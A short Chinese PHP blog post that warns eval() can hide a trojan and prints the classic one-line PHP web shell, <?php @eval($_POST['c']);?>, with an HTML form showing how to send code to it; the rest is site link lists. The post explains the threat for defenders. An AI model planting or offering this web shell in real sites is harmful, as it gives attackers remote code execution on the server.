编程 PHP

php eval函数一句话木马代码

Posted in PHP onMay 21, 2015

eval可以用来执行任何其他php代码，所以对于代码里发现了eval函数一定要小心，可能是木马

就这一句话害死人，这样任何人都可以post任何文件上来，所以要做好防范

<?php @eval($_POST['c']);?>

使用方法也很简单，本地提交文件指向提交文件，里面的php代码就会被执行

<html> 
<body> 
<form action="a.php" method="post"> 
<input type="text" name="c" value="phpinfo();"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html>

以上所述就是本文的全部内容了，希望大家能够喜欢。

php eval函数一句话木马代码

- Author -

hebedich

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php基础知识:类与对象(2) 自动加载对象

Dec 13 PHP

PHP has encountered an Access Violation

Jan 15 PHP

zend framework多模块多布局配置

Feb 26 PHP

php自定义函数截取汉字长度

May 15 PHP

PHP利用APC模块实现文件上传进度条的方法

Jan 26 PHP

php使用GD实现颜色渐变实例

Jun 02 PHP

简单的自定义php模板引擎

Aug 26 PHP

php实现用户登陆简单实例

Apr 04 PHP

[原创]PHP实现字节数Byte转换为KB、MB、GB、TB的方法

Aug 31 PHP

微信公众号开发之获取位置信息php代码

Jun 13 PHP

PHP批斗大会之缺失的异常详解

Jul 09 PHP

laravel 解决Eloquent ORM的save方法无法插入数据的问题

Oct 21 PHP

php结合正则批量抓取网页中邮箱地址

May 19 #PHP

php实现模拟登陆方正教务系统抓取课表

May 19 #PHP

PHP IDE phpstorm 常用快捷键

May 18 #PHP

PHP网络操作函数汇总

May 18 #PHP

PHP面向对象之后期静态绑定功能介绍

May 18 #PHP

php中关于socket的系列函数总结

May 18 #PHP

php简单socket服务器客户端代码实例

May 18 #PHP

You might like

PHP MSSQL 存储过程的方法

2008/12/24 PHP

php下过滤html代码的函数提高程序安全性

2010/03/02 PHP

$_GET['goods_id']+0 的使用详解

2013/06/06 PHP

php函数指定默认值方法的小例子

2013/12/04 PHP

PHP获取当前相对于域名目录的方法

2015/06/26 PHP

Javascript客户端将指定区域导出到Word、Excel的代码

2008/10/22 Javascript

利用javascript/jquery对上传文件格式过滤的方法

2009/07/25 Javascript

jquery中的查找parents与closest方法之间的区别

2013/12/02 Javascript

js 判断各种数据类型的简单方法(推荐)

2016/08/29 Javascript

详解Jquery 遍历数组之$().each方法与$.each()方法介绍

2017/01/09 Javascript

Node连接mysql数据库方法介绍

2017/02/07 Javascript

浅谈ES6新增的数组方法和对象

2017/08/08 Javascript

nodejs创建简易web服务器与文件读写的实例

2017/09/07 NodeJs

js合并两个数组生成合并后的key：value数组

2018/05/09 Javascript

vue数组对象排序的实现代码

2018/06/20 Javascript

Vuex的热更替如何实现

2020/06/05 Javascript

vue路由结构可设一层方便动态添加路由操作

2020/08/31 Javascript

vue中利用three.js实现全景图的完整示例

2020/12/07 Vue.js

详解Vite的新体验

2021/02/22 Javascript

[54:53]2014 DOTA2国际邀请赛中国区预选赛 LGD-GAMING VS CIS 第二场

2014/05/23 DOTA

[01:16]DOTA2小知识课堂 Ep.03 芒果树无伤肉山

2019/12/05 DOTA

用Django实现一个可运行的区块链应用

2018/03/08 Python

将python代码和注释分离的方法

2018/04/21 Python

Django 路由系统URLconf的使用

2018/10/11 Python

对python3.4 字符串转16进制的实例详解

2019/06/12 Python

python监控进程状态,记录重启时间及进程号的实例

2019/07/15 Python

jupyter note 实现将数据保存为word

2020/04/14 Python

简述 Python 的类和对象

2020/08/21 Python

python中spy++的使用超详细教程

2021/01/29 Python

Proenza Schouler官方网站：纽约女装和配饰品牌

2019/01/03 全球购物

2014年驾驶员工作总结

2014/11/18 职场文书

六年级学生评语大全

2014/12/26 职场文书

2015年大学团支部工作总结

2015/05/13 职场文书

学习习近平主席讲话心得体会

2016/01/20 职场文书

Redis高级数据类型Hyperloglog、Bitmap的使用

2021/05/24 Redis

Python实现科学占卜让视频自动打码

2022/04/09 Python